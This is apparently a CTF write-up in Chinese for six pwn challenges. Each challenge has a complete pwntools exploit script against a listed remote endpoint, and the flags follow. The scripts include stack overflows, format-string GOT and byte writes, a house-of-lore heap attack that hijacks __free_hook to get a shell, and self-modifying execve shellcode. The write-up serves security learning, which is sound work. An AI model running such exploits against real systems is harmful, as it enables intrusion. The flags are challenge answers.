除了最后一个手搓shellcode不习惯,没做出来,其他还好,RCTF打自闭,过来找找感觉(对,WTCL)
pwn1
溢出到另外一个变量绕过判断
1 | from pwn import*  # NOTE(review): str payloads throughout this page read as Python 2; on Python 3 pwntools these would need bytes literals |
2 | p = remote('49.235.243.206',10501)  # challenge endpoint given in the writeup |
3 | p.send('1'*0x28)  # 0x28 bytes of '1'; per the note above, the overflow reaches the variable the binary checks (layout not shown here) |
4 | p.interactive() |
pwn2
libc2.23中,其中0xF02A4与0xF1147与read函数的偏移是最接近的,直接爆破后面两个字节
1 | from pwn import*  # NOTE(review): Python 2 style str payloads; see the comment on pwn1 |
2 | payload = '%65c%12$hhn%6c%13$hhn'  # two single-byte %hhn writes, through positional args 12 and 13 |
3 | payload = payload.ljust(0x20,'\x00')  # pad so the two pointers below sit at a fixed offset; that offset maps to args 12/13 only if the stack layout matches (not visible here) |
4 | payload += p64(0x601028 + 1) + p64(0x601028)  # write targets; the note above says the low two bytes of the value are brute-forced |
5 | p = process('./main')  # NOTE(review): dead assignment; the local process is spawned, then discarded on the next line and never closed |
6 | p = remote('49.235.243.206',10502) |
7 | p.sendline(payload) |
8 | p.interactive() |
pwn3
栈溢出,还带后门,简单
1 | from pwn import*  # NOTE(review): Python 2 style str payloads; see the comment on pwn1 |
2 | p = process('./main')  # NOTE(review): dead assignment; overwritten by the remote() call on line 4 and never closed |
3 | b = 0x4007FB  # address the writeup calls the backdoor; fixed value, so the binary is presumably non-PIE (confirm) |
4 | p = remote('49.235.243.206',10503) |
5 | payload = '\x00'*0x20 + p64(0x40) + p64(b)  # 0x20 filler, one 8-byte slot (presumably saved rbp), then the return address |
6 | p.send(payload)  # send, not sendline: no trailing newline is appended |
7 | p.interactive() |
pwn4
house of lore模板题
1 | from pwn import*  # NOTE(review): Python 2 style str payloads; see the comment on pwn1 |
2 | context.log_level ='DEBUG'  # NOTE(review): DEBUG dumps every byte sent/received; noisy, consider 'info' once the script works |
3 | def name(data1,data2):  # menu choice 0: data1 goes to the 'name?' prompt, data2 to the 'desc?' prompt; uses the global p bound later in the script |
4 | p.sendlineafter('choice:','0') |
5 | p.sendafter('name?',data1)  # sendafter (no newline), so the raw bytes are delivered as-is |
6 | p.sendafter('desc?',data2) |
7 | def new(size):  # menu choice 1: allocate a message of the given size; uses the global p |
8 | p.sendlineafter('choice:','1') |
9 | p.sendlineafter('message?',str(size)) |
10 | def free(index):  # menu choice 2: delete the message at index; uses the global p |
11 | p.sendlineafter('choice:','2') |
12 | p.sendlineafter('deleted?',str(index)) |
13 | def edit(index,content):  # menu choice 3: overwrite the message at index with content (sent raw, no newline); uses the global p |
14 | p.sendlineafter('choice:','3') |
15 | p.sendlineafter('modified?',str(index)) |
16 | p.sendafter('message?',content) |
17 | def show(index):  # menu choice 4: print the message at index; the caller reads the output itself; uses the global p |
18 | p.sendlineafter('choice:','4') |
19 | p.sendlineafter('showed?',str(index)) |
20 | p = process('./main')  # NOTE(review): dead assignment; overwritten by remote() on the next line and never closed |
21 | p = remote('49.235.243.206',10504) |
22 | libc =ELF('./libc-2.23.so')  # symbol offsets come from the bundled libc; must match the remote libc |
23 | new(0x80) |
24 | new(0x200) |
25 | new(0x100) |
26 | free(0) |
27 | show(0)  # the bytes printed here are parsed on line 28 |
28 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x10 - 88 -libc.sym['__malloc_hook']  # take the 6 bytes ending at the first 0x7F, zero-pad to 8; the 0x10+88 adjustment is the writeup's constant for libc 2.23 |
29 | new(0x80) |
30 | p.recvuntil('Ptr: ') |
31 | heap_base = int(('0x' + p.recvuntil('\n',drop=True)),16) - 0x10  # the program prints a heap pointer; 0x10 back is taken as the heap start |
32 | log.info('LIBC:\t' + hex(libc_base)) |
33 | log.info('HEAP:\t' + hex(heap_base)) |
34 | free(1) |
35 | new(0x300) |
36 | victim = heap_base + 0x90 |
37 | fake_chunk2 = 0x602100  # fixed addresses written via name(); presumably a non-PIE data section (confirm) |
38 | fake_chunk1 = 0x602120 |
39 | name(p64(0) + p64(0x211) + p64(fake_chunk1),p64(0) + p64(0x211) + p64(victim) + p64(fake_chunk2))  # house-of-lore setup as described in the writeup text above |
40 | edit(1,p64(0) + p64(fake_chunk1)) |
41 | new(0x200) |
42 | new(0x200) |
43 | free_hook = libc_base + libc.sym['__free_hook'] |
44 | system = libc_base + libc.sym['system'] |
45 | edit(6,'\x00'*0x10 + p64(free_hook)) |
46 | edit(0,p64(system)) |
47 | edit(1,'/bin/sh\x00') |
48 | free(1) |
49 | p.interactive() |
pwn5
利用RBP的一个链,在栈上写上一个read_got,然后一次性改了read就行
1 | from pwn import*  # NOTE(review): Python 2 style str payloads; see the comment on pwn1 |
2 | p = process('./main')  # NOTE(review): dead assignment; overwritten by remote() on the next line and never closed |
3 | p = remote('49.235.243.206',10505) |
4 | libc =ELF('./libc-2.23.so')  # symbol offsets come from the bundled libc; must match the remote libc |
5 | payload = 'LIBC:%11$pStack:%8$p'  # leaks two pointers, tagged so they can be located with recvuntil below |
6 | p.sendline(payload) |
7 | p.recvuntil('LIBC:') |
8 | libc_base = int(p.recv(14),16) - libc.sym['__libc_start_main'] - 240  # 14 chars = '0x' + 12 hex digits; 240 is the writeup's offset into __libc_start_main |
9 | log.info('LIBC:\t' + hex(libc_base)) |
10 | p.recvuntil('Stack:') |
11 | target = int(p.recv(14),16)  # stack address used as the write target below |
12 | log.info('TARGET:\t' + hex(target)) |
13 | rce = libc_base + 0xF02A4  # the libc 2.23 offset mentioned in the pwn2 note above |
14 | read = 0x601020  # the read GOT slot named in the note above; fixed, so non-PIE is presumed (confirm) |
15 | def modify(addr,data):  # sends two format strings in sequence (first addr, then data); uses the global p |
16 | p.sendline(addr) |
17 | sleep(0.1)  # NOTE(review): fixed 100 ms pauses instead of waiting for a prompt; fragile on a slow link |
18 | p.sendline(data) |
19 | sleep(0.1) |
20 | modify('%' + str((target-8 + 2)&0xFF) + 'c%6$hhnFMYY','%' + str((read>>16)&0xFF) + 'c%8$hhnFMYY')  # three rounds: each first string adjusts one byte through arg 6, each second string writes one byte of read through arg 8 (per the note above) |
21 | modify('%' + str((target-8 + 1)&0xFF) + 'c%6$hhnFMYY','%' + str((read>>8)&0xFF) + 'c%8$hhnFMYY') |
22 | modify('%' + str((target-8 + 0)&0xFF) + 'c%6$hhnFMYY','%' + str((read)&0xFF) + 'c%8$hhnFMYY')  # NOTE(review): a %c count of 0 prints nothing, so a zero byte here would write 0 only if the format engine counts it as 0 — confirm |
23 | p.sendline('%' + str(rce&0xFFFF) + 'c%9$hn\x00')  # writes the low 16 bits of rce through arg 9 |
24 | p.interactive() |
pwn6
问了binLep师傅才知道的,太菜了,后面需要去搓搓shellcode了,哎……
就是一个写一段汇编从而绕过字符的范围判断,一开始让字符位于可见字符范围内,然后在汇编里面进行单字节修改到想要的字符串
1 | #!/usr/bin/env python |
2 | # -*- coding: utf-8 -*- |
3 | from pwn import * |
4 | p = process('./main')  # NOTE(review): dead assignment; overwritten by remote() on the next line and never closed |
5 | p = remote('49.235.243.206', 10506) |
6 | context.arch ='AMD64'  # NOTE(review): pwntools documents 'amd64'; this spelling appears to be accepted but confirm |
7 | shell = asm('''  # first stage; the writeup text above explains why the bytes are patched in place |
8 | push 0x70 |
9 | pop rdx |
10 | push rdi |
11 | push rdi |
12 | push rdi |
13 | sub byte ptr [rsi + 0x22], dl |
14 | sub byte ptr [rsi + 0x2A], dl |
15 | sub byte ptr [rsi + 0x2E], dl |
16 | sub byte ptr [rsi + 0x2F], dl |
17 | sub byte ptr [rsi + 0x45], dl |
18 | sub byte ptr [rsi + 0x45], dl |
19 | sub byte ptr [rsi + 0x45], dl |
20 | pop rsi |
21 | pop rsi |
22 | pop rdx |
23 | push 0x3b |
24 | pop rax |
25 | ''') |
26 | shell += "\x48\x2F\x2F\x62\x69\x6E\x2F\x73\x68\x70"  # NOTE(review): str appended to asm() output; fine on Python 2, a bytes/str TypeError on Python 3 |
27 | shell += asm(""" |
28 | push rdi |
29 | push rsp |
30 | pop rdi |
31 | """) |
32 | shell += "\x7F\x75" #syscall |
33 | p.send(shell)  # send, not sendline: no trailing newline is appended |
34 | p.interactive() |
FLAG
1 | pwn1: |
2 | flag{1325777C4AD2FC214638AFACD632CAB9} |
3 | pwn2: |
4 | flag{7221CB4A535A0F5E4C47F5FEEC64C952} |
5 | pwn3: |
6 | flag{E291A9922B72C69900DC4D0BB1E29BDE} |
7 | pwn4: |
8 | flag{38E0B6A2926319DAE8EBF1DCD161A331} |
9 | pwn5: |
10 | flag{3DD8600C697604883D8FF17048A6AF37} |
11 | pwn6: |
12 | flag{A1191C435648EFFC09A90A8A113117A3} |